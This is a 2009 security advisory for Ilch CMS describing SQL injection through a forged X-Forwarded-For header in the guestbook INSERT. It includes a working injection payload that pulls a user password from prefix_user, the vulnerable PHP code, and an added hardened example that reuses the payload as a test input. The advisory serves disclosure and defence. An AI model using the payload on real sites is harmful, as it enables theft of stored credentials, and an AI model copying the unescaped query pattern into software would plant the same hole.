Vulnerable: Ilch CMS

Type securityvulns
Reporter Securityvulns
Modified 2009-02-07T00:00:00


Ilch CMS (from is vulnerable to SQL injection.

The guestbook and the statistics are affected by the vulnerability.

  • Affected Versions: ilch 1.1L and below
  • Not vulnerable: ilch 1.1M

  • Exploit: Spoof your x-forwarded-for header to:

        ', (select `pass` from prefix_user WHERE `id` > 0 ORDER BY `id` LIMIT 1)) /*

    Then create a guestbook entry.
  • Timeline:
    3.Feb.09: Vuln reported to
    3.Feb.09: Got reply from ilch
    4.Feb.09: Version 1.1M is available which fixes the issue

Here is a summary of the vulnerability:

In include/includes/func/statistics.php, getip() returns the user-supplied X-Forwarded-For header without any validation:

    function getip() {
        if ($_SERVER["HTTP_X_FORWARDED_FOR"]) {
            // client-controlled header, returned verbatim
            return ($_SERVER["HTTP_X_FORWARDED_FOR"]);
        } else {
            return ($_SERVER["REMOTE_ADDR"]);
        }
    }

In include/contents/gbook.php, the value of getip() is concatenated into the INSERT statement without validation or escaping:

    db_query("INSERT INTO prefix_gbook
        (`name`,`mail`,`page`,`time`,`ip`,`txt`) VALUES ('".$name."', '".$mail."',
        '".$page."', '".time()."', '".getip()."', '".$txt."')");
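For comparison, here is a hardened version of the two pieces above: a getip() that only accepts a syntactically valid IP address, and the guestbook INSERT rewritten with a prepared statement. This is an added example, not Ilch's own code or its 1.1M fix; it assumes a PDO connection `$db` and the prefix_gbook column names shown above.

```php
<?php
// Added example (not Ilch code): validated client IP and a parameterised INSERT.

function getip_safe(): string
{
    $remote = $_SERVER['REMOTE_ADDR'] ?? '';
    $xff    = $_SERVER['HTTP_X_FORWARDED_FOR'] ?? '';

    // X-Forwarded-For is client-controlled. Only honour it when the first hop
    // parses as an IP address; anything else (such as SQL fragments) is dropped.
    // Even a well-formed value should only be trusted behind a known proxy.
    if ($xff !== '') {
        $first = trim(explode(',', $xff)[0]);
        if (filter_var($first, FILTER_VALIDATE_IP) !== false) {
            return $first;
        }
    }

    // Fall back to the TCP peer address, which the web server sets itself.
    return filter_var($remote, FILTER_VALIDATE_IP) !== false ? $remote : '0.0.0.0';
}

function insert_gbook_entry(PDO $db, string $name, string $mail, string $page, string $txt): bool
{
    // Placeholders keep every value, including the IP, out of the SQL text,
    // so a forged header can no longer alter the statement structure.
    $stmt = $db->prepare(
        'INSERT INTO prefix_gbook (`name`,`mail`,`page`,`time`,`ip`,`txt`) VALUES (?,?,?,?,?,?)'
    );
    return $stmt->execute([$name, $mail, $page, time(), getip_safe(), $txt]);
}

// Constructed sample request: the header carries the shape of the advisory's payload.
$_SERVER['REMOTE_ADDR'] = '203.0.113.5';
$_SERVER['HTTP_X_FORWARDED_FOR'] = "', (select `pass` from prefix_user LIMIT 1)) /*";
// The forged header fails IP validation, so the peer address is used instead.
echo getip_safe(), PHP_EOL;
```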

getip() is also used in includes/func/user.php, but that path is much harder to exploit:

    db_query("INSERT INTO prefix_online (sid,uptime,ipa) VALUES

Please credit the discovery to Gizmore from :)

Kind Regards, Gizmore